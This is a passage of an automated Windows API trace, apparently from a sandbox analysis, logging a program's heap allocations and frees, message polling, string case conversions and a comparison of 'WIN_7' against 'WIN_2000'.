Flags=0x0, Size=0x10) returned 0x24a9708 [0261.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0261.492] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0261.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0261.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0261.492] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0261.492] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.493] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.493] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.494] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0261.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0261.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.496] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0261.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.498] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.498] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.498] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.499] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0261.499] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0261.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0261.499] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0261.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0261.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.502] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.504] HeapFree (in: hHeap=0x25c0000, 